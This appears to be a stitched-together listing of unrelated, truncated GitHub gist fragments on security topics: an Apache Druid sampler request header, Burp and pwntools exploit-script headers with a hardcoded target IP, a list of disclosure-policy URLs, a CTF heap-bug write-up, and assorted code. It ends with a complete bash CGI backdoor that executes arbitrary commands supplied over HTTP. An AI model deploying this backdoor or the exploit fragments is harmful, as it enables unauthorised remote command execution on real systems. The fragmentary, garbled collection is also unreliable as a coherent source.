0xf4n9x

POST /druid/indexer/v1/sampler HTTP/1.1
Host: x.x.x.x:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1045
Connection: close

bendtheory

import xml.etree.ElementTree as ET
import urllib
import base64
import math
import sys
import re

# usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file. 
# python burplist.py burprequests.xml
# output is saved to wordlist.txt

byt3bl33d3r

#[

    Author: Marcello Salvati, Twitter: @byt3bl33d3r
    License: BSD 3-Clause

    AES256-CTR Encryption/Decryption
]#

import nimcrypto
import nimcrypto/sysrand

prinsharma1999

google dork -> site:.co.uk inurl:"responsible disclosure"
https://registry.internetnz.nz/about/vulnerability-disclosure-policy/
http://www.123contactform.com/security-acknowledgements.htm
https://18f.gsa.gov/vulnerability-disclosure-policy/
https://support.1password.com/security-assessments/
https://www.23andme.com/security-report/
https://www.abnamro.com/en/footer/responsible-disclosure.html
https://www.accenture.com/us-en/company-accenture-responsible-disclosure
https://www.accredible.com/white_hat/
https://www.acquia.com/how-report-security-issue

luker983

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
import subprocess
from Crypto.Util.number import bytes_to_long, long_to_bytes
from Crypto.Cipher import AES
import hashlib
import os
import base64
from gmpy2 import is_prime

luker983

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *

context.update(arch='amd64')
exe = './server.rb'

host = args.HOST or '52.192.42.215'
port = int(args.PORT or 9427)

Jack-Works

#! Aaaaaaaaaaa this is JS!!!
// https://github.com/tc39/proposal-hashbang
// This file is mixing all new syntaxes in the proposal in one file without considering syntax conflict or correct runtime semantics
// Enjoy!!! 
// Created at Nov 23, 2018

for await(const x of (new A // https://github.com/tc39/proposal-pipeline-operator
|> do { // https://github.com/tc39/proposal-do-expressions
    case(?) { // https://github.com/tc39/proposal-pattern-matching
        when {val}: class {

Cgboal

#!/usr/bin/bb

(defn comment-line? [line]
  (re-find #"^\#" line))

(defn tcp-line? [line]
  (re-find #"\/tcp" line))

(defn extract-port [substr]
  (-> (str substr)

farazsth98

Functionality

At the beginning, the binary lets you enter 0x20 bytes for your name. This is stored in the bss section, and it is not null terminated. After this, you get the following menu options:

1. Show Name - Shows you your name
2. Write Diary - Lets you allocate a page of max 0x80 size. The first four bytes of this page chunk stores the size you choose, and then the rest is the content you enter. calloc is used to allocate this chunk. This chunk's pointer is stored in an array immediately after your name in the bss section (meaning the name can be aligned to it and you can leak it using option 1). You can have a max of 14 pages.
3. Read Diary - Lets you pick a page index, and the corresponding page contents is output to you (using puts).
4. Edit Diary - Lets you pick a page index to edit. It will use the size stored in the first 4 bytes of the page chunk to determine how many bytes you can edit. The page index you enter is signed, so there is a bug here (you can enter negative

MarkBaggett

cd /tmp
mkdir cgi-bin
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
chmod +x ./cgi-bin/backdoor.cgi 
python -m http.server --cgi